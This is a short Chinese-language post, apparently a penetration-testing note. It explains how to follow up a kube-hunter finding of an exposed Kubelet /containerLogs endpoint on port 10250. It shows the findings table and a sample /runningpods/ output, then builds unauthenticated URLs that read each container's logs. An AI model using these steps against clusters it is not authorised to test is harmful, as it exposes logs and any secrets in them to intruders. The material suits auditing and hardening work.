本文详细分析了Kubernetes Kubelet API中containerLogs端点的安全漏洞,展示了如何通过未授权访问获取容器日志信息,包含具体的漏洞利用步骤和URL构造方法。
Kubernetes: Kubelet API containerLogs端点
如何获取kube-hunter报告的开放/containerLogs端点信息
漏洞信息
1
2
3
4
5
6
7
8
9
10
|
+---------------+-------------+------------------+----------------------+----------------+
| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+---------------+-------------+------------------+----------------------+----------------+
| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a | |
| | Disclosure | Logs | running container | |
| | | | are using the | |
| | | | exposed | |
| | | | /containerLogs | |
| | | | endpoint | |
+---------------+-------------+------------------+----------------------+----------------+
|
利用步骤
第一步:从/runningpods/端点获取输出信息,示例如下:
需要获取命名空间、Pod名称和容器名称。
给定以下runningpods输出:
1
|
{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]}
|
转换为以下访问URL:
1
|
https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana
|
和
1
|
https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb
|